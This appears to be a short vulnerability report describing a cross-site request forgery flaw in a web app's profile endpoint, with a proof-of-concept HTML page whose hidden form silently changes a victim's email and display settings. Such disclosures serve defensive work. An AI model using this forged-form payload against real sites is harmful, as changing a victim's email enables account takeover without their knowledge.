An attacker can make a user change his profile settings by CSRF vulnerability through PoC file.
There is no CSRF token.
For example, changing the email address from “[email protected]” to “[email protected]” (test1’s profile).
Make the user open a link with this page poc.html:
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8083/me" method="POST">
<input type="hidden" name="email" value="test1@test.comm" />
<input type="hidden" name="kindle_mail" value="" />
<input type="hidden" name="locale" value="en" />
<input type="hidden" name="default_language" value="all" />
<input type="hidden" name="show_16" value="on" />
<input type="hidden" name="show_65536" value="on" />
<input type="hidden" name="show_128" value="on" />
<input type="hidden" name="show_256" value="on" />
<input type="hidden" name="show_32" value="on" />
<input type="hidden" name="show_8" value="on" />
<input type="hidden" name="show_4" value="on" />
<input type="hidden" name="show_64" value="on" />
<input type="hidden" name="show_4096" value="on" />
<input type="hidden" name="show_2" value="on" />
<input type="hidden" name="show_8192" value="on" />
<input type="hidden" name="show_16384" value="on" />
<input type="hidden" name="show_32768" value="on" />
<input type="hidden" name="show_131072" value="on" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
This vulnerability is capable of allow unwanted actions and changes in the profile of a user who didn’t notice the hidden intention.